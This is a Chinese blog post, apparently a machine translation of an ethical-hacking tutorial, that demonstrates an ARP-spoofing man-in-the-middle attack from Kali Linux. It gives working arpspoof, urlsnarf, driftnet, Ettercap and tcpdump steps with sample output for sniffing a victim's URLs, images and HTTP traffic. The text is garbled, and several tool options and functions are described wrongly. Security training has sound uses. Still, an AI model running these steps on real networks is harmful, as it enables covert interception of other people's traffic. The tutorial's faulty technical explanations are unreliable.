使用MITM监控流量（中间人攻击）

发表评论
661 views

A+

所属分类：未分类

MITM INRO： -

MITM（中间人攻击）是攻击者嗅探网络中正在运行的会话的另一种方法。这种攻击最常见于每个测试者。这是一种攻击者拦截路由器和目标设备之间通信的方法。攻击者必须将他的设备显示为路由器，如下所示。

在上图中，它显示了受害者如何向路由器发送请求。但转发IPv4网络包后。攻击者的机器充当目标的路由器。

MITM如何影响个人用户？

根据国际网络安全研究所的道德黑客研究员的研究，大多数情况下都有大量的公共网络。因此，攻击者可以在任何公共网络中使用MTIM方法。攻击者可以通过多种方式伤害个人。攻击者可以使用攻击劫持方法来窃取目标设备浏览的缓存和cookie。 Cookie是用户访问任何网站时在浏览器上运行的一小段数据。

为了向您展示MITM攻击，我们使用Kali Linux作为攻击者机器，使用Windows 7作为目标机器。

要扫描目标，只需运行nmap scan即可获取网络中目标设备的IPv4 。为了向您展示我们使用Windows 7作为目标。所以我们已经有了目标设备的IPv4 。
或者你可以使用基于GUI的工具Netcat ，它告诉不。目前网络中的主机。
在kali linux终端中输入ifconfig到kali linux的IP地址。
然后键入ip route show以检查路由器的默认网关地址。
输入sysctl -w net.ipv4.ip_forward = 1进行数据包转发。

  root @ kali：/ home / iicybersecurity #sysctl -w net.ipv4.ip_forward = 1
 net.ipv4.ip_forward = 1

执行上述命令后，所有IPv4网络包将从kali linux转发。所以kali linux将充当路由器。
Arpsoofing ARP （地址解析协议）是攻击者向路由器发送伪造请求的攻击。这导致将路由器的默认IP地址链接到攻击者的mac地址。现在，如果网络上的任何人都会搜索任何内容，攻击者就会知道。

受害者（192.168.1.3）===攻击者（192.168.1.2）====路由器（192.168.1.1）

然后在kali linux中打开另一个终端并输入arpspoof

  root @ kali：/ home / iicybersecurity＃ arpspoof
 版本：2.4
 用法：arpspoof [-i interface] [-c own | host | both] [-t target] [-r] host

上面的输出显示了在中间攻击中将用于男性的选项。
-i用于输入网络接口名称。
-c用于输入Kail linux IP地址和目标设备IP地址。
-t用于输入目标设备IP地址
-r用于输入默认网关IP地址。

在本地区域网络上启动ARP欺诈： -

输入arpspoof -i eth0 -t 192.168.1.3 -r 192.168.1.1
-i用于输入网络接口名称。
-t用于输入目标设备IP地址。
-r用于输入默认网关IP地址。

  root @ kali：/ home / iicybersecurity＃ arpspoof -i eth0 -t 192.168.1.3 -r 192.168.1.1

 0：c：29：56：c5：9c 20：e4：17：4：ff：73 0806 42：arp回复192.168.1.1 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 8c：e1：17：8d：5c：e4 0806 42：arp回复192.168.1.3 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 20：e4：17：4：ff：73 0806 42：arp回复192.168.1.1 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 8c：e1：17：8d：5c：e4 0806 42：arp回复192.168.1.3 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 20：e4：17：4：ff：73 0806 42：arp回复192.168.1.1 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 8c：e1：17：8d：5c：e4 0806 42：arp回复192.168.1.3 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 20：e4：17：4：ff：73 0806 42：arp回复192.168.1.1 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 8c：e1：17：8d：5c：e4 0806 42：arp回复192.168.1.3 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 20：e4：17：4：ff：73 0806 42：arp回复192.168.1.1 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 8c：e1：17：8d：5c：e4 0806 42：arp回复192.168.1.3 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 20：e4：17：4：ff：73 0806 42：arp回复192.168.1.1 is-at 0：c：29：56：c5：9c
 0：c：29：56：c5：9c 8c：e1：17：8d：5c：e4 0806 42：arp回复192.168.1.3 is-at 0：c：29：56：c5：9c

执行上述命令后，arpspoofing将向路由器发送伪造请求。此请求将路由器默认IP地址链接到kali linux mac地址。
Arp欺骗现在已经开始，攻击者现在可以使用以下命令嗅探目标。

来自目标设备的SNIFF网站： -

打开另一个终端并输入urlsnarf -i eth0
Urlsnarf显示目标正在访问的所有网站。
-i用于输入网络接口名称。

  root @ kali：/ home / iicybersecurity＃ urlsnarf -i eth0
 urlsnarf：监听eth0 [tcp端口80或端口8080或端口3128]
 cyberthreat  -   -  [13 / Dec / 2018：00：26：50 -0500]“POST http://webres3.t.ctmail.com/SpamResolverNG/SpamResolverNG.dll?DoNewRequest HTTP / 1.0” -   - “ - ”“Mozilla /4.0（兼容; Win32; Commtouch Http客户端）“
 网络威胁 -  [13 / Dec / 2018：00：30：13 -0500]“获取http://www.gstatic.com/android/config_update/11052018-sms-metadata.txt HTTP / 1.1” -   - “ - ” “AndroidDownloadManager / 4.4.2（Linux; U; Android 4.4.2; VMware Virtual Platform Build / KVT49L）”
 网络威胁 -  [13 / Dec / 2018：00：31：02 -0500]“获取http://goo.gl/ARIlS5 HTTP / 1.1” -   - “ - ”“Wget”
 android-46cc75570167703e  -  [13 / Dec / 2018：00：31：56 -0500]“GET http://goo.gl/ARIlS5 HTTP / 1.1” -   - “ - ”“Wget”
 android-46cc75570167703e  -  [13 / Dec / 2018：00：31：56 -0500]“获取http://git.linux.org.tw/houdini.tgz HTTP / 1.1” -   - “ - ”“Wget”
 android-46cc75570167703e  -  [13 / Dec / 2018：00：32：30 -0500]“GET http://goo.gl/ARIlS5 HTTP / 1.1” -   - “ - ”“Wget”
 android-46cc75570167703e  -  [13 / Dec / 2018：00：32：58 -0500]“GET http://goo.gl/ARIlS5 HTTP / 1.1” -   - “ - ”“Wget”
 android-46cc75570167703e  -  [13 / Dec / 2018：00：32：58 -0500]“GET http://git.linux.org.tw/houdini.tgz HTTP / 1.1” -   - “ - ”“Wget”
 android-46cc75570167703e  -  [13 / Dec / 2018：00：33：41 -0500]“获取http://goo.gl/ARIlS5 HTTP / 1.1” -   - “ - ”“Wget”

执行上述命令后，Urlsnarf找到了3台正在路由器上运行的设备。 Urlsnarf作为路由器工作并向网站显示目标正在访问的内容。

目标设备的SNIFF图像： -

打开另一个终端并输入driftnet -i eth0
Driftnet显示了受害者在互联网上搜索的图像，如下所示。
-i用于输入网络接口名称。
一个新窗口将在kali linux中打开，并将嗅探目标正在访问的所有图像。

  root @ kali：/ home / iicybersecurity＃driftnet -i eth0
损坏的JPEG数据：标记0x79之前的81个外部字节
不支持的标记类型0x79
 Thu Dec 13 05:22:33 2018 [driftnet]警告：driftnet-5c1232e96b8b4567.jpeg：bogus image（err = 4）
 libpng警告：iCCP：已知的sRGB配置文件不正确
 libpng警告：iCCP：已知的sRGB配置文件不正确
 libpng警告：iCCP：已知的sRGB配置文件不正确
 libpng警告：iCCP：已知的sRGB配置文件不正确
 libpng警告：iCCP：已知的sRGB配置文件不正确

执行上述命令后，攻击者可以看到正在访问的目标的网站图像。
有时它会显示libpng waring的错误：ICCP：已知错误的sRGB配置文件，这意味着图像格式已损坏。
在上面的屏幕截图中，某些区域是黑色的，因为某些图像无法加载。

完成攻击： -

嗅探目标后，键入sysctl -w net.ipv4.ip_forward= 0

  root @ kali：/ home / iicybersecurity #sysctl -w net.ipv4.ip_forward = 0
 net.ipv4.ip_forward = 0

执行上述命令以禁用数据包转发。

中间人攻击的GUI版本： -

Ettercap是中间人攻击中最常用的工具。它的功能与上述方法相同，但它提供了在中间攻击中使用人的最快捷方式。

此工具预装在Kali Linux中。所以只需去搜索并输入ettercap 。
然后单击ettercap图标，如下所示。

现在ettercap将打开并点击统一嗅探 。如果使用同一网络上的交换机连接目标和攻击者，也可以选择桥接嗅探，如果同一网络上没有交换机，则选择统一嗅探。

然后，您必须选择网络接口，如下所示。

现在选择网络接口后，ettercap将启动对默认网关地址的统一嗅探。

然后，您必须扫描默认网关上的主机列表。只需转到主机选项卡，然后单击扫描主机即可 。

如下所示，在扫描主机6主机后，已找到 。

现在选择目标，转到主机并单击主机列表 。现在我们将选择192.168.1.10作为向您展示的目标。

选择目标192.168.1.10。

现在选择目标192.168.1.10

现在单击mitm选项卡，然后单击ARP中毒，如下所示。

选择嗅探远程连接，如下所示。从这里开始arp中毒。

然后打开一个新终端并输入tcpdump -i eth0 -n port 80和host 192.168.1.10
这将捕获目标的所有流量。
-i用于输入网络接口名称。
-n用于输入端口号。
host用于输入目标IP地址192.168.1.10
如果目标访问任何网站。在下面的目标是访问www.reddit.com目标流量将被捕获，如下所示。

执行该命令后，将捕获所有目标流量。

目标的上述流量是可用于其他黑客活动的重要信息。

国际网络安全研究所的道德黑客攻击研究员表示，MITM是一种常用于收集信息的攻击，最常用于测试者的安全评估。